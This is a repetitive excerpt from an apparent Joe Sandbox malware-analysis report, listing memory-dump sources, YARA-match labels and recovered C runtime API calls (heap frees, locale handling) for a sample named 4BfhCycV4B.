                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 042ED000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_42ed000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$Info
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$Info
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0041F695
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F68A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F6AC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F6C1
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F6CC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F6EE
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F701
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F70F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F71A
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F752
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F759
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F776
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F78E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0421F8FC
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421EC68
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421EC7A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421EC8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421EC9E
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECB0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECC2
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECD4
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ED0A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ED1C
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ED2E
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ED40
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F8F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F913
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F928
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F933
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F955
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F968
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F976
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F981
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F9B9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F9C0
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F9DD
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F9F5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DecodePointer
                                                                                                                                                                                                                                                                                        • String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                                                        • API String ID: 3527080286-940912563
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EA0
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EAC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EB7
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EC2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216ECD
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216ED8
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EE3
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EEE
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EF9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216F07
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                                                                                        • API String ID: 835844855-1405518554
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 042043F5
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04204404
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 0420441B
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::_Lockit.LIBCPMT ref: 04201590
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::~_Lockit.LIBCPMT ref: 042015AA
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 04204424
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 04204455
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0420446B
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04204491
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID: {wB
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 04203656
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04203665
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 0420367C
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::_Lockit.LIBCPMT ref: 04201590
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::~_Lockit.LIBCPMT ref: 042015AA
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 04203685
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 042036B6
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 042036CC
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 042036F2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID: {wB
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 04203861
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04203870
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 04203887
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::_Lockit.LIBCPMT ref: 04201590
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::~_Lockit.LIBCPMT ref: 042015AA
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 04203890
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 042038C1
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 042038D7
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 042038FD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID: {wB
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
